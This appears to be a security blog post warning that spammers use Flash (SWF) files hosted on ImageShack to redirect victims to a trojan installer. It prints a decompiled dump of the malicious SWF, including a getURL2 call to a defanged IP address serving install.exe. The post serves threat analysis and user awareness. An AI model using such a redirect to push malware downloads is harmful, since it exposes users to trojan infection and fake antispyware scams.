Folks, this is the new wave: SWF file redirects continue

In an earlier blog post, I mentioned that spammers are now using Shockwave Flash (SWF) files to avoid detection (similar in nature to the trick of using Google redirects, etc. in the past).

This continues. Here’s a current example:

This is a typical spam you see these days, pushing an install of trojan that, if installed, typically downloads a rogue malicious antispyware program.

Clicking on the link takes us to a SWF file hosted on ImageShack:

As you can see, it’s just junk text displaying. It’s entire purpose is to push the download of that install.exe file (the trojan).

If we take a wee peek inside that SWF file, we see what’s going on:

movie 'mal.swf' compressed // flash 6, total frames: 3, frame rate: 50 fps, 978x580 px

// unknown tag 777 length 3

exportAssets
1 as 'arial'
end // of exportAssets

exportAssets
2 as 'line1'
end // of exportAssets

exportAssets
3 as 'line2'
end // of exportAssets

exportAssets
4 as 'line3'
end // of exportAssets

defineMovieClip 5 // total frames: 1

end // of defineMovieClip 5

exportAssets
5 as 'TextBox'
end // of exportAssets

frame 1

constants 'http://89 187 49 18/install exe', '_self'
push 'http://89 187 49 18/install exe', '_self'
getURL2
end // of frame 1

frame 2
stop
end // of frame 2
end

So the malware authors have a nice place to redirect from -- a file hosted on Imageshack.

Alex Eckelberry